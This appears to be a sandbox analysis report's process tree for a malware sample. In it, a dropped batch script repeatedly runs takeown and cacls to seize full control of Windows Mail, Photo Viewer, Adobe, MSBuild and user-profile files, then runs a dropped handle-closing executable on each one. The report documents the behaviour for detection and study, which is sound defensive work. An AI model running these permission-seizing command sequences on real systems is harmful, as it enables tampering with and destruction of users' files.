- Executes dropped EXE
PID:4336
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:4324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:4552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "wabmig.exe" -nobanner3⤵PID:4592
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:4960
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""2⤵PID:4612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C3⤵PID:4720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "BrowserCore.exe.mui" -nobanner3⤵PID:4796
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "BrowserCore.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4940
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:4580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:4284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "wab.exe" -nobanner3⤵PID:4936
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:4920
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""2⤵PID:4548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C3⤵PID:4660
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "BrowserCore.exe" -nobanner3⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "BrowserCore.exe" -nobanner4⤵
- Executes dropped EXE
PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:4768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵PID:4400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵
- Executes dropped EXE
PID:4340
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:4824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:5092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "wabmig.exe" -nobanner3⤵PID:4840
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:5104
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""2⤵PID:5052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:4212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "Identity-H" -nobanner3⤵PID:4928
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "Identity-H" -nobanner4⤵
- Executes dropped EXE
PID:4392
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:4628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:4792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "WinMail.exe" -nobanner3⤵PID:4800
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "WinMail.exe" -nobanner4⤵
- Executes dropped EXE
PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:4124
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:4716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1868
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "WinMail.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4564
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:4472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:4388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:4252
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
PID:4228
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4240
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:5056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:4256
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4636
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:4544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4740
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4308
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""2⤵PID:4480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:4236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "Identity-V" -nobanner3⤵PID:4812
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "Identity-V" -nobanner4⤵
- Executes dropped EXE
PID:4924
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:3372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:1332
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "wab.exe" -nobanner3⤵PID:4264
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:4144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:4852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:2604
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:4460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:2172
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4860
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:4780
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:4468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:4180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
PID:4620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:5108
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:4632
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:5160
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:5208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:5264
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:5308
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:5356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:5412
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:5468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:5516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat"3⤵PID:5536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "settings.dat" -nobanner3⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "settings.dat" -nobanner4⤵PID:5572
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵PID:5616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵PID:5664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵
- Modifies file permissions
PID:5684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵PID:5720
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""2⤵PID:5764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C3⤵PID:5812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"3⤵
- Modifies file permissions
PID:5832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "vedatamodel.jfm" -nobanner3⤵PID:5852
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "vedatamodel.jfm" -nobanner4⤵PID:5868
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:5916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:5964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:5984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "settings.dat" -nobanner3⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "settings.dat" -nobanner4⤵PID:6020
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""2⤵PID:6068
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C3⤵PID:6116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"3⤵
- Modifies file permissions
PID:6140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "vedatamodel.edb" -nobanner3⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "vedatamodel.edb" -nobanner4⤵PID:5144
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵PID:4944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵PID:5240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵
- Modifies file permissions
PID:5252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵PID:5288
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵PID:5188
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:5368
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:5408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:5312
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵PID:5328
-
-
-
